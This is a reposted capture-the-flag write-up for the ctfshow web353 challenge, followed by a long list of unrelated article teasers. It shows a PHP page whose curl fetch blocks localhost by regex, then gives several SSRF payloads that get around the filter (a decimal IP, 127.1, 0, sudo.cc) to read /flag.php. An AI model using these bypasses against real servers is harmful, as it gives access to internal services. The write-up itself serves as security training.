ctfshow web353

news/2025/9/19 19:57:25/文章来源:https://www.cnblogs.com/zdqjudy/p/19101566 
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127\.0\.|\。/i', $url)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{die('hacker');
}
}
else{die('hacker');
}
?> hacker

一样的,会执行你的curl会话,只要访问本地目录flag即可,但是过滤了127.0.0.1

// IP转数字

url=http://2130706443/flag.php

// 缺省零

url=http://127.1/flag.php

// 127.0.0.1 ~ 127.255.255.254 都表示 localhost

url=http://127.255.255.254/flag.php

// sudo.cc

url=http://sudo.cc/flag.php

// 0 在 linux 系统中会解析成 127.0.0.1

// 在 windows 中解析成 0.0.0.0

url=http://0/flag.php

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/908045.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

fxztgxj5.dll fxzrs4qj.dll fxztgxa5.dll fxzrs3qj.dll fxzpmc1.dll fxzrs2qj.dll fxzmpxa5.dll - 实践

fxztgxj5.dll fxzrs4qj.dll fxztgxa5.dll fxzrs3qj.dll fxzpmc1.dll fxzrs2qj.dll fxzmpxa5.dll - 实践

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …
阅读更多...
Linux虚拟机常用命令与Hadoop生态组件启动大全

Linux虚拟机常用命令与Hadoop生态组件启动大全

本文将分为两部分,第一部分整理Linux虚拟机下的高频操作命令(文件编辑、解压、拷贝等),第二部分汇总Hadoop, Zookeeper, HBase, Hive等组件的启动/停止命令,方便随时查阅。 第一部分:Linux虚拟机高频操作命令 1.…
阅读更多...
测试新手必学:10个让Bug无处遁形的黑盒测试技巧

测试新手必学:10个让Bug无处遁形的黑盒测试技巧

在软件开发的世界中,测试是确保产品质量的重要环节。对于刚踏入测试领域的新手来说,掌握有效的测试方法至关重要。在众多测试方法中,黑盒测试因其独特的优势备受青睐。它不需要测试人员了解代码内部实现,而是专注于…
阅读更多...
private void Form1_Load与构造方法前执行顺序

private void Form1_Load与构造方法前执行顺序

Form1_Load 事件是在 构造方法之后,窗体初始化之后 执行的。也就是说,Form1_Load 事件发生在窗体构造方法执行之后,但在窗体完全显示之前。 窗体的初始化顺序 构造函数:Form1 的构造方法会首先执行,构造方法中通常…
阅读更多...
数据分类分级如何高效低成本落地?|高效智能的数据分类分级产品推荐(2025)

数据分类分级如何高效低成本落地?|高效智能的数据分类分级产品推荐(2025)

数据分类分级如何高效低成本落地?|高效智能的数据分类分级产品推荐(2025)在《数据安全法》(第二十一条)与《个人信息保护法》确立分类分级制度框架、并由《网络数据安全管理条例》(2024 年,第五条、第二十九条…
阅读更多...
文化课暂时计划

文化课暂时计划

1. 作业完成策略 数学 \(/\) 物理 \(\gt\) 化学 \(\gt\) 英语 \(\gt\) 生物 \(\gt\) 语文 学会的可以适当的抄。 2. 课上效率提升 这一点,我觉得非常重要,课上时间是非常宝贵的,课上效率低下,课下就一定得找时间找…
阅读更多...
BGP路由属性与选路-1

BGP路由属性与选路-1

阅读更多...
private void Form1_Load和 private void Form1_Activated 方法区别

private void Form1_Load和 private void Form1_Activated 方法区别

orm1_Load 和 Form1_Activated 都是 WinForms 中常见的事件方法,它们在窗体生命周期的不同阶段被触发。虽然它们都与窗体的显示和激活相关,但它们的触发时机和目的有所不同。让我们来具体看看它们的区别:Form1_Load…
阅读更多...
BGP反射路由器

BGP反射路由器

阅读更多...
HarmonyOS Stage模型与ArkTS:现代应用开发的核心架构与最佳实践 - 详解

HarmonyOS Stage模型与ArkTS:现代应用开发的核心架构与最佳实践 - 详解

HarmonyOS Stage模型与ArkTS:现代应用开发的核心架构与最佳实践 - 详解pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: …
阅读更多...
【CV】图像超分辨率的一些基础概念

【CV】图像超分辨率的一些基础概念

【CV】图像超分辨率的一些基础概念Posted on 2025-09-19 19:32 SaTsuki26681534 阅读(0) 评论(0) 收藏 举报图像退化模型 在图像超分辨率(Super-Resolution, SR)任务中,退化模型(Degradation Model) 是核心基…
阅读更多...
完整教程:苹果WWDC25开发秘技揭秘:SwiftData3如何重新定义数据持久化

完整教程:苹果WWDC25开发秘技揭秘:SwiftData3如何重新定义数据持久化

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …
阅读更多...
H5 页面与 Web 页面的制作方法 - 实践

H5 页面与 Web 页面的制作方法 - 实践

H5 页面与 Web 页面的制作方法 - 实践pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Mona…
阅读更多...
Python面试题及详细答案150道(116-125) -- 性能优化与调试篇 - 实践

Python面试题及详细答案150道(116-125) -- 性能优化与调试篇 - 实践

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …
阅读更多...
完整教程:构建基石:Transformer架构

完整教程:构建基石:Transformer架构

完整教程:构建基石:Transformer架构2025-09-19 19:21 tlnshuju 阅读(0) 评论(0) 收藏 举报pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !i…
阅读更多...
Spring Cloud Gateway吞吐量优化

Spring Cloud Gateway吞吐量优化

目录一、网络与容器层面优化二、路由与过滤器优化三、缓存与限流优化四、JVM 与资源优化五、监控与压测验证总结 Spring Cloud Gateway 作为基于 Netty 的异步非阻塞网关,其吞吐量(吞吐量)优化需要从 网络配置、线程…
阅读更多...
【先记录一下】windows下使用的lazarus/fpc安装到中文的目录时出错的问题

【先记录一下】windows下使用的lazarus/fpc安装到中文的目录时出错的问题

【先记录一下】windows下使用的lazarus/fpc安装到中文的目录时出错的问题windows下使用的lazarus/fpc安装到中文的目录时出错的问题由以下3个不支持中文引起的:1、make.exe 我使用mingw64带的make.exe替换不支持中…
阅读更多...
物联网摄像头硬件设计秘籍:低成本与低功耗的平衡之道

物联网摄像头硬件设计秘籍:低成本与低功耗的平衡之道

如何在物联网摄像头设计中平衡“低成本”与“低功耗”?关键在于硬件层面的精准把控。本文从镜头模组选型、主控芯片方案到休眠唤醒机制,拆解实用技巧,助您以最优配置实现长续航、低成本,解锁物联网视觉应用新可能。…
阅读更多...
CF182C Optimal Sum

CF182C Optimal Sum

题目传送门贪心、权值线段树题意 给定一个数字 \(len\) 和一个长度为 \(n(n\le 10^5)\) 的数组 \(a\),你最多可以执行 \(k\) 次操作 \(a_i \leftarrow -a_i\),请你最大化 \[\max \limits_{i\in [1,n]} \bigl | \sum_…
阅读更多...
完整教程:WinForms 项目里生成时选择“首选目标平台 32 位导致有些电脑在获取office word对象时获取不到

完整教程:WinForms 项目里生成时选择“首选目标平台 32 位导致有些电脑在获取office word对象时获取不到

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …
阅读更多...
最新文章

Copyright @ 2022~2023